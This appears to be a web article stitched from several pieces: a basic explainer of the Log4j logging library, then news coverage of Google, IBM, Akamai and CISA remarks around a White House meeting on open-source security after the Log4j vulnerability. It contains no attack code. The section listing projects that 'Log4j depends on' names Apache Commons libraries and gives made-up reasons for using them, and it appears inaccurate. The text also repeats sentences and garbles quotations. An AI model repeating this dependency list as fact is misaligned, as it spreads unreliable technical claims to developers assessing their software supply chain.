Google and IBM
What is Log4j?
Log4j is an open source logging framework for Java applications. It provides a flexible and configurable way to log messages in different formats, such as plain text, XML, and JSON, to various output destinations, such as console, files, and remote servers. Log4j is widely used in many Java-based applications, including enterprise systems, web applications, and mobile apps.
Log4j allows developers to log messages with different levels of severity, such as DEBUG, INFO, WARN, ERROR, and FATAL. Each message level has a specific purpose and indicates the severity of the event being logged. For example, DEBUG is used to log messages that provide detailed information for troubleshooting, while ERROR is used to log messages that indicate a critical error that requires immediate attention.
Log4j also provides various features for filtering and formatting log messages. Developers can configure Log4j to filter messages based on their level, source, or content, and format them in different ways using patterns and layout templates.
Log4j has been around since 2001 and is maintained by the Apache Logging Services Project. It is a widely used logging framework and has become a de facto standard for logging in Java applications. However, recent vulnerabilities in certain versions of Log4j have highlighted the importance of keeping it up-to-date and secure.
Log4j Open Source Logging Library
Log4j is an open-source logging library for Java. It is used by many Java applications to log messages in a variety of formats, including plain text, XML, and JSON. Given the recent Log4j vulnerabilities, Google and IBM are likely interested in identifying essential open source projects that Log4j depends on, and which are critical for maintaining the security and reliability of Java applications.
Here are some essential open source projects that Log4j depends on:
- Apache Commons Lang: This project provides a set of utility classes for working with strings, dates, numbers, and other common data types in Java. Log4j uses this project to perform string manipulation and other common operations.
- Apache Commons Collections: This project provides a set of data structures and algorithms for working with collections of objects in Java. Log4j uses this project to manage collections of log messages.
- Apache Commons IO: This project provides a set of utility classes for working with input/output operations in Java. Log4j uses this project to write log messages to files and other output streams.
- Apache Log4j API: This project provides the core logging APIs used by Log4j. It defines the interfaces that applications use to log messages, and allows Log4j to be easily integrated with other logging frameworks.
- Apache Log4j Core: This project provides the implementation of the logging APIs defined by the Log4j API project. It is responsible for actually writing log messages to various output sources.
- SLF4J: This project provides a simple facade for various logging frameworks, including Log4j. It allows applications to easily switch between different logging frameworks without having to change their code.
These are just a few of the essential open source projects that Log4j depends on. There are many others, including various Apache projects and other third-party libraries. It is important to keep these projects up-to-date and secure in order to maintain the security and reliability of Java applications that use Log4j.
Google and IBM have requested a list of essential open source projects for Log4j
Google also recommended forming an organization to serve as a marketplace for open source maintenance after attending a meeting at the White House.
Google also recommended forming an organization to serve as a marketplace for open source maintenance after attending a meeting at the White House. Officials from Apache, Google, Apple, Amazon, IBM, Microsoft, Meta, Linux, and Oracle, as well as government institutions like the Department of Defense and the Cybersecurity and Infrastructure Security Agency,Anne Neuberger, the White House’s cybersecurity director, was one of the speakers at the event (CISA). The conference took place as businesses work to address the Log4j vulnerability, which has been a source of concern since its discovery in December.
Given the worldwide relevance of digital infrastructure, Kent Walker, head of Google and Alphabet’s global affairs, believes it’s time to think of it in the same way we think of physical infrastructure.
“Open source software is a connecting tissue for much of the internet world, and it needs the same attention and financing as our roads and bridges receive,” Walker added.
Walker noted in a blog post that during the discussion, Google proposed numerous options for how to proceed in the aftermath of the Log4j issue.
Walker believes that identifying a list of crucial open source projects will require a public-private cooperation, and that criticality should be assessed based on a project’s influence and importance. The list will assist businesses in prioritising and allocating resources to the most critical security examinations and enhancements.
IBM’s enterprise security head Jamie Thomas echoed Walker’s remarks, saying the White House meeting “made clear that government and industry can work together to promote open source security standards.”
“We can start by encouraging widespread adoption of open and sensible security standards, identifying critical open source assets that must meet the most stringent security requirements, promoting a collaborative national effort to expand skills training and education in open source security, and rewarding developers who make significant contributions to the field,” Thomas said.
Walker lauded the efforts of groups like the OpenSSF, which has received a $100 million investment from Google and is already working on developing standards.
He also stated that Google recommended forming an entity to act as a marketplace for open source maintenance, combining volunteers from businesses with the most vital projects in need of assistance. He stated that Google was “prepared to provide resources” to the effort.
According to Joe Brockmeier, vice president of marketing at the Apache Software Foundation, there is no single “silver bullet” for resolving the security challenges that plague the open source supply chain. “The route forward will necessitate upstream collaboration by corporations and organizations that consume and ship open source software,” he continued.
Many of the measures proposed by Google and IBM were backed by Akamai, which also had representatives at the White House meeting. Governments and the technology community must develop reliable containment plans for when exploits are discovered, improve cross-government and industry information sharing when vulnerabilities are first discovered, and expand government authorization of solutions to increase defences, according to Akamai.
A important takeaway from the discussion, according to Boaz Gelbord, Akamai’s chief security officer, was the common recognition that more needed to be done to help the open source community flourish in the ever-changing threat landscape.
“Akamai sees an unique need for improved information sharing, strong vulnerability management, and putting out containment measures to minimise the blast radius of assaults,” Gelbord added. “We’re excited to broaden our efforts in the open source community and contribute to the critical next steps that will emerge from this White House discussion.”
The White House is concerned about the next major open source vulnerability after Log4j
Today, the White House will host a meeting with IT leaders to examine Log4j and other potential security flaws.
The White House is hosting a meeting today with Apache, Google, Apple, Amazon, and other major IT giants to discuss software security and open source technologies. This comes in the wake of the Log4j vulnerability, which has provoked global outrage since its discovery in December.
White House National Security Advisor Jake Sullivan requested the meeting in a letter to the companies in December, claiming that it was a “national security problem” for basic open source software to be maintained by volunteers.
Officials from IBM, Microsoft Corp., Meta, Linux, and Oracle, as well as government agencies such as the Department of Defense and the Cybersecurity and Infrastructure Security Agency, are expected to attend the conference, which is being organised by White House cybersecurity advisor Anne Neuberger (CISA).
The incident surrounding Log4j, according to Chris Inglis, National Cyber Director, “has underlined the need to improve our software security and the transparency of our software supply chain.”
The Apache Software Foundation, which maintains Log4j and is entirely run by volunteers, released a flurry of documents describing their position and efforts to resolve the vulnerability ahead of the conference. Some of the documents provide an implicit defence of the company’s crisis response, referring to Log4j as “an awful combination of separately created features within the Java platform,” among other things.
Apache manages 227 million lines of code and hundreds of open source projects, according to the company.
CISA director Jen Easterly and CISA executive assistant director for cybersecurity Eric Goldstein told reporters at a press conference earlier this week that they had not seen any “high-profile breaches or attacks” related to the Log4J vulnerability, aside from the attack on the Belgian Defense Ministry.
“This could be because sophisticated attackers have already exploited this vulnerability to target targets and are merely waiting for network defenders to become less vigilant before exploiting their newfound access.” Everyone knows the Equifax data leak in September 2017, which was caused by an open-source software flaw found in March of that year “Easterly remarked.
CISA is speeding its attempts to build a “software bill of materials” (SBOM) as a result of Log4j, according to Easterly, who added that they recently hired Allan Friedman, who previously directed cybersecurity and SBOM work at the Commerce Department. Friedman is currently in charge of SBOM projects both inside and outside the United States government. In their efforts to address open source security concerns, Easterly and Goldstein both highlighted today’s White House meeting.
“We are prioritising support and openness for developers and maintainers of those specific frameworks and components.” We are prioritising this strategy because of the ubiquity of these components and their ubiquitous application across technology contexts. This weakness will spur more attention, focus, and investment, resulting in improved security “According to Goldstein.
According to Goldstein, despite the lack of large-scale attacks, fraudsters have been scanning and exploiting Log4Shell to install cryptomining software on target computers or capture victim systems for use in botnets.
There have already been three generations of the Log4j vulnerability, according to Steve Povolny, McAfee Enterprise’s head of advanced threat research, raising concerns about wider issues with similar systems. While he does not expect any further iterations of the Log4j flaw, he pointed to recent study on JNDI concerns as an example of how widespread awareness of Log4j has led to the identification of other flaws.
“What you’re seeing here is a 20-year pattern I refer to as ambulance chasing, and it’s a really successful method for identifying comparable flaws.” It happens a lot when there are a lot of critical weaknesses, where someone exposes exploit code and the research sector finds a new subject of interest because it’s glamorous and timely,” he explained. “However, it proves to be an excellent strategy for flushing out similar types of vulnerabilities in projects and products that are either identical or distantly related.”